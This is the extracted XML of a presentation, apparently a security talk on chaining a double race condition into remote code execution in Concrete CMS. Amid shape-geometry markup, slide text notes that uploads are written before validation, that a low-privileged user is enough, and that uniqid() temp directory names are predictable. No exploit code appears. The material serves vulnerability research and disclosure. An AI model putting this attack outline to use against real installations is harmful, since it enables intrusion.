                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1473708" y="5566537"/>
                    <a:pt x="1575308" y="5562092"/>
                    <a:pt x="1676908" y="5548249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1733804" y="5540375"/>
                    <a:pt x="1790827" y="5537581"/>
                    <a:pt x="1847977" y="5537581"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1948053" y="5537581"/>
                    <a:pt x="2048129" y="5546344"/>
                    <a:pt x="2147951" y="5552059"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2267839" y="5558790"/>
                    <a:pt x="2387727" y="5564759"/>
                    <a:pt x="2507488" y="5564759"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2622423" y="5564759"/>
                    <a:pt x="2737358" y="5559298"/>
                    <a:pt x="2852166" y="5543550"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2894711" y="5538597"/>
                    <a:pt x="2937510" y="5536057"/>
                    <a:pt x="2980309" y="5536057"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3036443" y="5536057"/>
                    <a:pt x="3092450" y="5540375"/>
                    <a:pt x="3147949" y="5548757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3217545" y="5558028"/>
                    <a:pt x="3287141" y="5561584"/>
                    <a:pt x="3356610" y="5561584"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3459353" y="5561584"/>
                    <a:pt x="3561842" y="5553837"/>
                    <a:pt x="3664585" y="5545201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3709035" y="5542026"/>
                    <a:pt x="3753612" y="5540502"/>
                    <a:pt x="3798062" y="5540502"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3868928" y="5540502"/>
                    <a:pt x="3939794" y="5544439"/>
                    <a:pt x="4010279" y="5552440"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4041394" y="5555615"/>
                    <a:pt x="4072763" y="5557139"/>
                    <a:pt x="4104005" y="5557139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4135247" y="5557139"/>
                    <a:pt x="4166616" y="5555615"/>
                    <a:pt x="4197731" y="5552440"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4227576" y="5549392"/>
                    <a:pt x="4257421" y="5548249"/>
                    <a:pt x="4287266" y="5548249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4364482" y="5548249"/>
                    <a:pt x="4441571" y="5556123"/>
                    <a:pt x="4518787" y="5560441"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4633214" y="5566791"/>
                    <a:pt x="4747768" y="5574030"/>
                    <a:pt x="4862449" y="5575173"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4921377" y="5575173"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4941443" y="5574919"/>
                    <a:pt x="4961636" y="5574538"/>
                    <a:pt x="4981829" y="5573776"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5029200" y="5573142"/>
                    <a:pt x="5076317" y="5567299"/>
                    <a:pt x="5122418" y="5556886"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5204968" y="5536439"/>
                    <a:pt x="5287899" y="5529073"/>
                    <a:pt x="5371084" y="5529073"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5447157" y="5529073"/>
                    <a:pt x="5523357" y="5535169"/>
                    <a:pt x="5599557" y="5543169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5669153" y="5550408"/>
                    <a:pt x="5740908" y="5548885"/>
                    <a:pt x="5811393" y="5551679"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5836285" y="5552568"/>
                    <a:pt x="5861304" y="5552949"/>
                    <a:pt x="5886196" y="5552949"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5951601" y="5552949"/>
                    <a:pt x="6017006" y="5550663"/>
                    <a:pt x="6082284" y="5550663"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6144895" y="5550663"/>
                    <a:pt x="6207379" y="5552822"/>
                    <a:pt x="6269736" y="5561204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6278118" y="5563108"/>
                    <a:pt x="6286627" y="5563998"/>
                    <a:pt x="6295263" y="5563998"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6300598" y="5563998"/>
                    <a:pt x="6306058" y="5563617"/>
                    <a:pt x="6311392" y="5562855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6358001" y="5550917"/>
                    <a:pt x="6404356" y="5546726"/>
                    <a:pt x="6450711" y="5546726"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6542659" y="5546726"/>
                    <a:pt x="6634354" y="5563109"/>
                    <a:pt x="6726174" y="5567427"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6780022" y="5569967"/>
                    <a:pt x="6833617" y="5571618"/>
                    <a:pt x="6887083" y="5571618"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6994398" y="5571618"/>
                    <a:pt x="7101205" y="5564887"/>
                    <a:pt x="7208266" y="5544948"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7269734" y="5533518"/>
                    <a:pt x="7331583" y="5529581"/>
                    <a:pt x="7393686" y="5529581"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7478903" y="5529581"/>
                    <a:pt x="7564374" y="5537074"/>
                    <a:pt x="7649464" y="5543297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7750682" y="5551806"/>
                    <a:pt x="7852282" y="5556505"/>
                    <a:pt x="7953882" y="5557901"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8235314" y="5551679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8235314" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect r="-3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70874" y="4489034"/>
            <a:ext cx="11049492" cy="7705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11"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4550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–File Uploads are fun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674601" y="6412576"/>
            <a:ext cx="2103606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191875" y="6414706"/>
            <a:ext cx="78810" cy="221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5314969" y="0"/>
            <a:ext cx="6870886" cy="6851855"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9169375" cy="9144000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-18923" y="0"/>
              <a:ext cx="9188323" cy="9144000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9188323" h="9144000">
                  <a:moveTo>
                    <a:pt x="1489202" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1346200" y="262128"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1085850" y="764413"/>
                    <a:pt x="867156" y="1288161"/>
                    <a:pt x="680212" y="1828292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="389255" y="2676271"/>
                    <a:pt x="188468" y="3552444"/>
                    <a:pt x="81026" y="4441952"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24892" y="4897247"/>
                    <a:pt x="0" y="5351907"/>
                    <a:pt x="35306" y="5809869"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77216" y="6345301"/>
                    <a:pt x="140462" y="6877304"/>
                    <a:pt x="247523" y="7403973"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365760" y="7985252"/>
                    <a:pt x="526288" y="8552815"/>
                    <a:pt x="738251" y="9104376"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="754888" y="9144000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="825119" y="9144000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815975" y="9122029"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="698754" y="8818626"/>
                    <a:pt x="596392" y="8507730"/>
                    <a:pt x="506603" y="8190230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="428498" y="7913751"/>
                    <a:pt x="370967" y="7631557"/>
                    <a:pt x="304292" y="7351903"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="302641" y="7337044"/>
                    <a:pt x="301879" y="7322058"/>
                    <a:pt x="301752" y="7307199"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="301752" y="7307199"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="350647" y="7476744"/>
                    <a:pt x="389763" y="7626350"/>
                    <a:pt x="435864" y="7773797"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="556260" y="8157845"/>
                    <a:pt x="695071" y="8531352"/>
                    <a:pt x="852932" y="8894064"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="970026" y="9144000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9188323" y="9144000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9188323" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1655318" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1527048" y="198247"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1351407" y="487299"/>
                    <a:pt x="1191895" y="786003"/>
                    <a:pt x="1046480" y="1093216"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1039368" y="1111377"/>
                    <a:pt x="1027684" y="1127252"/>
                    <a:pt x="1012444" y="1139317"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1012444" y="1139317"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1032129" y="1093216"/>
                    <a:pt x="1051052" y="1046734"/>
                    <a:pt x="1070991" y="1000506"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1152398" y="811657"/>
                    <a:pt x="1238504" y="625602"/>
                    <a:pt x="1329563" y="442341"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1566164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743618" y="848468"/>
            <a:ext cx="4950410" cy="1466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86"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4204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first race condition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32158" y="2665210"/>
            <a:ext cx="98727" cy="597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32"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2177" spc="-17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66030" y="2863463"/>
            <a:ext cx="3896981" cy="2389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3"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2177" spc="6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File is downloaded from remote server (auth SSRF by design)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3451"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2177" spc="10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Low Privileged user is needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2401"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2177" spc="2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First the file is written on the system, then validation is done</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3614"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2177" spc="2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If it fails validation, then it’s </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1188"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2177" spc="6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deleted (?!?!?)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191875" y="6414706"/>
            <a:ext cx="78810" cy="221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8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32158" y="3339415"/>
            <a:ext cx="98727" cy="597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32"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2177" spc="-17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32158" y="3706919"/>
            <a:ext cx="98727" cy="597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32"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2177" spc="-17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32158" y="4360669"/>
            <a:ext cx="98727" cy="597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32"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2177" spc="-17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225" y="6362700"/>
            <a:ext cx="1343025" cy="152400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1343025" h="152400">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1343025" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1343025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0" y="0"/>
            <a:ext cx="12192000" cy="4562475"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="16256000" cy="60833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256000" cy="6083300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="16256000" h="6083300">
                  <a:moveTo>
                    <a:pt x="3472688" y="5624195"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3477006" y="5624703"/>
                    <a:pt x="3481197" y="5625211"/>
                    <a:pt x="3485515" y="5625719"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3484372" y="5626100"/>
                    <a:pt x="3483102" y="5626227"/>
                    <a:pt x="3481832" y="5626227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3479038" y="5626227"/>
                    <a:pt x="3475990" y="5625465"/>
                    <a:pt x="3472688" y="5624195"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="9055227" y="5992114"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9053576" y="5993003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9053957" y="5992368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9055354" y="5992241"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4716907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560705" y="4902327"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="866521" y="4996815"/>
                    <a:pt x="1174242" y="5085588"/>
                    <a:pt x="1483868" y="5168519"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2130679" y="5341747"/>
                    <a:pt x="2783713" y="5489702"/>
                    <a:pt x="3442335" y="5612384"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3453892" y="5614543"/>
                    <a:pt x="3464052" y="5620893"/>
                    <a:pt x="3472688" y="5624195"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3472688" y="5624195"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3106293" y="5580126"/>
                    <a:pt x="2732913" y="5527167"/>
                    <a:pt x="2359914" y="5469636"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1837817" y="5388991"/>
                    <a:pt x="1318006" y="5297043"/>
                    <a:pt x="801117" y="5189220"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="565658" y="5139944"/>
                    <a:pt x="330708" y="5087493"/>
                    <a:pt x="96521" y="5031232"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="5006213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5081524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91313" y="5104765"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="605155" y="5228209"/>
                    <a:pt x="1123188" y="5332984"/>
                    <a:pt x="1644650" y="5424678"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2144903" y="5511927"/>
                    <a:pt x="2646807" y="5588889"/>
                    <a:pt x="3150235" y="5655818"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3598799" y="5715889"/>
                    <a:pt x="4048252" y="5768721"/>
                    <a:pt x="4498467" y="5814441"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4931664" y="5858510"/>
                    <a:pt x="5363464" y="5904738"/>
                    <a:pt x="5796407" y="5946013"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6203950" y="5985002"/>
                    <a:pt x="6612637" y="6012180"/>
                    <a:pt x="7021830" y="6028817"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7338695" y="6042151"/>
                    <a:pt x="7655433" y="6060694"/>
                    <a:pt x="7972298" y="6077203"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8078089" y="6083300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8484997" y="6083300"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8521446" y="6078220"/>
                    <a:pt x="8558276" y="6075680"/>
                    <a:pt x="8595106" y="6075680"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8609711" y="6075680"/>
                    <a:pt x="8624443" y="6076061"/>
                    <a:pt x="8639048" y="6076950"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8842375" y="6070853"/>
                    <a:pt x="9045956" y="6065646"/>
                    <a:pt x="9249537" y="6058281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9662922" y="6043421"/>
                    <a:pt x="10075672" y="6019546"/>
                    <a:pt x="10488422" y="5989701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10806049" y="5966714"/>
                    <a:pt x="11123422" y="5938012"/>
                    <a:pt x="11440414" y="5907786"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11711559" y="5881243"/>
                    <a:pt x="11981815" y="5849239"/>
                    <a:pt x="12252198" y="5814949"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12608179" y="5769737"/>
                    <a:pt x="12963271" y="5718302"/>
                    <a:pt x="13317347" y="5660136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13743432" y="5590539"/>
                    <a:pt x="14167231" y="5510402"/>
                    <a:pt x="14589252" y="5419978"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14987905" y="5334634"/>
                    <a:pt x="15383638" y="5240019"/>
                    <a:pt x="15776321" y="5133594"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16256000" y="4994275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16256000" y="4921250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16002000" y="4996053"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15399893" y="5166106"/>
                    <a:pt x="14790547" y="5309489"/>
                    <a:pt x="14175867" y="5431028"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13667358" y="5531231"/>
                    <a:pt x="13156437" y="5617591"/>
                    <a:pt x="12643103" y="5690108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12263500" y="5743448"/>
                    <a:pt x="11883009" y="5789676"/>
                    <a:pt x="11501247" y="5828792"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11037443" y="5877179"/>
                    <a:pt x="10572623" y="5914771"/>
                    <a:pt x="10107422" y="5944743"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9798939" y="5964555"/>
                    <a:pt x="9490075" y="5980811"/>
                    <a:pt x="9180830" y="5988050"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9159112" y="5988558"/>
                    <a:pt x="9137649" y="5992114"/>
                    <a:pt x="9116186" y="5992114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9102217" y="5992114"/>
                    <a:pt x="9087738" y="5994400"/>
                    <a:pt x="9073768" y="5994400"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9072117" y="5994400"/>
                    <a:pt x="9070466" y="5994400"/>
                    <a:pt x="9068815" y="5994273"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9056115" y="5991860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9250679" y="5976620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9271380" y="5973953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10290555" y="5886196"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10621136" y="5853811"/>
                    <a:pt x="10951336" y="5819648"/>
                    <a:pt x="11280647" y="5779516"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11711050" y="5726811"/>
                    <a:pt x="12140310" y="5667248"/>
                    <a:pt x="12568427" y="5601081"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13015340" y="5532374"/>
                    <a:pt x="13460476" y="5454269"/>
                    <a:pt x="13903959" y="5367274"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14464156" y="5257419"/>
                    <a:pt x="15020923" y="5132451"/>
                    <a:pt x="15572867" y="4988941"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15744444" y="4945126"/>
                    <a:pt x="15915258" y="4899025"/>
                    <a:pt x="16085438" y="4850765"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16256000" y="4799838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625600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732158" y="4791885"/>
            <a:ext cx="4563104" cy="895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30"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3005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Concrete CMS – </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3230"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3004" b="1">
                <a:solidFill>
                  <a:srgbClr val="5F477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pseudo random dir name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345017" y="4884790"/>
            <a:ext cx="4886060" cy="382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51"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2179" spc="6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uniqid() is used to create a temp dir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116417" y="4888170"/>
            <a:ext cx="98841" cy="374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8"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2179" spc="-17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45017" y="5411715"/>
            <a:ext cx="5117749" cy="362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04"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150" spc="8" err="1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uniqid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2150" spc="8">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri (MS)"/>
                <a:ea typeface="Calibri (MS)"/>
                <a:cs typeface="Calibri (MS)"/>
                <a:sym typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>() is not a crypto secure function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871246" y="6279513"/>
            <a:ext cx="2259366" cy="20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Fixing Security pain points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191875" y="6414706"/>
            <a:ext cx="78810" cy="221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42C9C8"/>
                </a:solidFill>
                <a:latin typeface="Calibri (MS)"/>
                <a:ea typeface="Calibri (MS)"/>
                <a:cs typeface="Calibri (MS)"/>
                <a:sym typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>9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116417" y="5412330"/>
            <a:ext cx="98841" cy="374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8"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2179" spc="-17">
                <a:solidFill>
                  <a:srgbClr val="5F477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•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6953CFE2738E49BB704F04CA7530A7" ma:contentTypeVersion="11" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="8c2bbb812d2cdf8854a4e120ced9876b">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="ec727d12-16bd-4884-bd53-9ed3113957b7" xmlns:ns3="0d431b18-534c-4c03-8a73-46c06e60a63e" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="7f80c450e3720657bd654046696ec23f" ns2:_="" ns3:_="">
    <xsd:import namespace="ec727d12-16bd-4884-bd53-9ed3113957b7"/>
    <xsd:import namespace="0d431b18-534c-4c03-8a73-46c06e60a63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727d12-16bd-4884-bd53-9ed3113957b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431b18-534c-4c03-8a73-46c06e60a6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F457006-6C7E-41A8-A85F-DB76CB8A22DC}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="0d431b18-534c-4c03-8a73-46c06e60a63e"/>
    <ds:schemaRef ds:uri="ec727d12-16bd-4884-bd53-9ed3113957b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B11EF01-0D56-4893-8694-B5236AE68ED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C72973-AF72-49DD-9A0D-9B3D2F5753FD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ConcreteCMS - double race codition to RCE.pdf</dc:title>
  <cp:revision>48</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-19T10:04:45Z</dcterms:modified>
  <dc:identifier>DAGiEYqtoYY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0x010100176953CFE2738E49BB704F04CA7530A7</vt:lpwstr>
  </property>
</Properties>
</file>

<file path=docProps/thumbnail.jpeg>
</file>